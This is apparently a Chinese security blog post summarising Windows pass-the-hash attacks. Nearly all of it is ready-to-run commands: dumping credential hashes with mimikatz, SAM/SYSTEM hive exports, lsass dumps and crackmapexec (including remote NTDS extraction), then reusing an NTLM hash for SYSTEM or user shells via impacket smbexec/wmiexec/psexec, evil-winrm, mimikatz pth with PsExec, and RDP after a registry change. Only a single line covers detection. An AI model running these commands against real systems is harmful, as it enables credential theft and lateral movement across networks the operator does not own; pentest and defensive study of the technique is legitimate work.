一、简介
- 本文为对哈希传递攻击手法的补充。
- 前文:传送门
NTLM认证流程
![图片[1]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045140-1024x588.png)
二、哈希提取
2.1 mimikatz
- 提取哈希输入到
hash.txt文件中mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit > hash.txt
![图片[2]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045151-1024x614.png)
2.2 注册表提取
- 依赖工具:
impacket-secretsdump - 提取SAM数据库及解密信息
reg save hklm\sam sam.hivereg save hklm\system system.hive
![图片[3]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045200.png)
- 解密
SAM数据库impacket-secretsdump -sam sam.hive -system system.hive LOCAL
![图片[4]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045212-1024x481.png)
2.3 进程转储
- 任务管理器==> 详细信息 ==>
lsass.exe==> 创建转储文件
![图片[5]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045228-1024x451.png)
- 转储文件解析
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit >hash.txt
![图片[6]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045236-1024x584.png)
2.4 Crackmapexec
- 远程提取
SAMcrackmapexec smb IP -u username -p password --sam
![图片[7]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045252-1024x263.png)
- 远程提取
LSAcrackmapexec smb IP -u username -p password --lsa- 注:
LSA参考:传送门
![图片[8]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045315-1024x325.png)
2.5 NTDS提取
- 本地提取:传送门
- 远程提取
crackmapexec smb IP -u username -p password --ntds
![图片[9]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045328-1024x753.png)
三、哈希传递
3.1 smbexec
- 补充:直接使用将导致乱码,请加上
-codec gbk,以此解决命令无法解析的问题! - 格式:
python3 smbexec.py domain/user@ip -hashes :hash -codec gbk impacket-smbexec tech.com/[email protected] -hashes :224b59e02691d9be47ee26ca2313c1d2- 取得账户权限为:
system
![图片[10]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045340-1024x264.png)
3.2 wmiexec
- 格式:
python3 wmiexec.py domain/user@ip -hashes :hash -codec gbk impacket-wmiexec tech.com/[email protected] -hashes :224b59e02691d9be47ee26ca2313c1d2- 取得账户权限为:
认证账户
![图片[11]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045359-1024x299.png)
3.3 psexec
- 格式:
python3 psexec.py domain/user@ip -hashes :hash -codec gbk impacket-psexec tech.com/[email protected] -hashes :224b59e02691d9be47ee26ca2313c1d2- 取得账户权限为:
system
![图片[12]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045411-1024x514.png)
3.4 winrm
- 格式:
evil-winrm -i TargetIP -u username -H hash evil-winrm -i 192.168.30.227 -u [email protected] -H 224b59e02691d9be47ee26ca2313c1d2- 取得账户权限为:
认证账户
![图片[13]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045422-1024x255.png)
3.5 mimikatz
mimikatz联合`PSTools“- 开启特殊会话窗口:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:tech.com /ntlm:224b59e02691d9be47ee26ca2313c1d2" - 于自动开启的窗口中使用
PSTools-PSexec:PsExec.exe \\192.168.30.227 cmd - 补充:
![图片[14]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045433-1024x392.png)
3.6 RDP
- 我们可以使用
RDP工具执行RDP PTH攻击,以获得对目标系统的GUI访问权限xfreerdp - 但是需要启用受限管理模式以允许
PTH,否则无法通过RDP访问目标主机 - 注意:受限管理模式默认关闭,所以需要额外配置才能通过
PTH的方式通过RDP访问目标 - 开启受限模式
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f- 注:开启受限模式注册表,仅需普通账户权限即可
- PTH
xfreerdp /v:192.168.30.227 /u:administrator /pth:224b59e02691d9be47ee26ca2313c1d2
![图片[15]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045445-1024x468.png)
四、溯源
- 事件特征:登录账户为特权账户或高权限账户,但使用者信息为空
![图片[16]-哈希传递攻击总结-XSS博客](https://xsx.tw/wp-content/uploads/2024/10/d2b5ca33bd20241028045457-1024x795.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容